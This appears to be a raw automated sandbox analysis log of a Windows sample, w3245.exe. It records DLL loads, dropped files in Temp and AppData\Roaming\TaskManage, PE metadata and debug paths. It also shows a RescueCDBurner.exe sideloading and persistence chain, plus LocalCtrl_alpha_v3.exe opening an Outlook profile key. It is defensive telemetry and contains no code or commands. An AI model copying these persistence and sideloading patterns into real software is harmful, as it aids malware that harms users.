Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeSection loaded: pla.dllJump to behavior
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeSection loaded: tdh.dllJump to behavior
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: starburn.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: qtcore4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: qtgui4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: qtnetwork4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: qtxml4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: pla.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: pdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: tdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: starburn.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: qtcore4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: qtgui4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: qtnetwork4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: qtxml4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: pla.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: pdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: tdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\w3245.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F11-9C73-11D3-B32E-00C04F990BB4}\InProcServer32Jump to behavior
Source: fkefe.4.drLNK file: ..\..\Roaming\TaskManage\RescueCDBurner.exe
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
Source: w3245.exeStatic file information: File size 15806278 > 1048576
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeFile opened: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\msvcr100.dllJump to behavior
Source: w3245.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: w3245.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: w3245.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: w3245.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: w3245.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: w3245.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: w3245.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: w3245.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: w3245.exe, 00000000.00000000.1658861478.000000000080B000.00000002.00000001.01000000.00000003.sdmp, w3245.exe, 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp, w3245.exe, 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp, w3245.exe, 00000001.00000000.1665459198.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: msvcr100.i386.pdb source: RescueCDBurner.exe, RescueCDBurner.exe, 00000002.00000003.1693692874.0000000001812000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000002.1715594343.000000006BD71000.00000020.00000001.01000000.0000000D.sdmp, RescueCDBurner.exe, 00000003.00000002.1776456470.000000006B031000.00000020.00000001.01000000.00000017.sdmp
Source: Binary string: msvcp100.i386.pdb source: RescueCDBurner.exe, 00000002.00000002.1715727918.000000006BE31000.00000020.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000003.00000002.1777432976.000000006CBE1000.00000020.00000001.01000000.00000016.sdmp
Source: Binary string: wntdll.pdbUGP source: RescueCDBurner.exe, 00000002.00000002.1715404801.000000000A8B0000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000002.1715225657.000000000A555000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775652774.000000000A420000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775526982.000000000A0CD000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775805982.000000000A7D7000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045741846.0000000005170000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045008302.0000000004896000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2372737686.0000000005D30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RescueCDBurner.exe, 00000002.00000002.1715404801.000000000A8B0000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000002.1715225657.000000000A555000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775652774.000000000A420000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775526982.000000000A0CD000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775805982.000000000A7D7000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045741846.0000000005170000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045008302.0000000004896000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2372737686.0000000005D30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: RescueCDBurner.exe, 00000002.00000003.1697883667.000000000AC94000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1697883667.000000000AC94000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Release\i386\StarBurn.pdb source: RescueCDBurner.exe, 00000002.00000002.1717094583.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, RescueCDBurner.exe, 00000003.00000002.1777831407.000000006CDC1000.00000020.00000001.01000000.00000011.sdmp
Source: w3245.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: w3245.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: w3245.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: w3245.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: w3245.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_5BB3CB21 _GetDiskFreeSpaceEx_@16,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree,1_2_5BB3CB21
Source: lshbkgxootar.12.drStatic PE information: real checksum: 0x2865d3 should be: 0x28b45f
Source: QtCore4.dll.1.drStatic PE information: real checksum: 0x283beb should be: 0x284aa4
Source: QtCore4.dll.2.drStatic PE information: real checksum: 0x283beb should be: 0x284aa4
Source: Fondue.dll.1.drStatic PE information: real checksum: 0x34dc9 should be: 0x3baae
Source: xbsvw.4.drStatic PE information: real checksum: 0x2865d3 should be: 0x28b45f
Source: StarBurn.dll.1.drStatic PE information: real checksum: 0xa4afa should be: 0xab76c
Source: StarBurn.dll.2.drStatic PE information: real checksum: 0xa4afa should be: 0xab76c
Source: w3245.exeStatic PE information: section name: .wixburn
Source: w3245.exe.0.drStatic PE information: section name: .wixburn
Source: LocalCtrl_alpha_v3.exe.4.drStatic PE information: section name: Shared
Source: xbsvw.4.drStatic PE information: section name: .xdata
Source: xbsvw.4.drStatic PE information: section name: gjwrx
Source: lshbkgxootar.12.drStatic PE information: section name: .xdata
Source: lshbkgxootar.12.drStatic PE information: section name: gjwrx
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007EEAD6 push ecx; ret 0_2_007EEAE9
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A2EAD6 push ecx; ret 1_2_00A2EAE9
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BD8B658 push ecx; ret 2_2_6BD8B66B
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BD80CC5 push ecx; ret 2_2_6BD80CD8
Source: msvcr100.dll.1.drStatic PE information: section name: .text entropy: 6.9169969425576285
Source: StarBurn.dll.1.drStatic PE information: section name: .text entropy: 6.9340411158815725
Source: msvcr100.dll.2.drStatic PE information: section name: .text entropy: 6.9169969425576285
Source: StarBurn.dll.2.drStatic PE information: section name: .text entropy: 6.9340411158815725
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\TaskManage\QtXml4.dllJump to dropped file
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\TaskManage\QtGui4.dllJump to dropped file
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeFile created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\Fondue.dllJump to dropped file
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeFile created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\QtXml4.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\xbsvwJump to dropped file
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeFile created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeJump to dropped file
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeJump to dropped file
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeFile created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\QtGui4.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\lshbkgxootarJump to dropped file
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeFile created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\StarBurn.dllJump to dropped file
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeFile created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\msvcr100.dllJump to dropped file
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\TaskManage\StarBurn.dllJump to dropped file
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeFile created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\msvcp100.dllJump to dropped file
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\TaskManage\QtNetwork4.dllJump to dropped file
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\TaskManage\msvcp100.dllJump to dropped file
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeFile created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\QtNetwork4.dllJump to dropped file
Source: C:\Users\user\Desktop\w3245.exeFile created: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeJump to dropped file
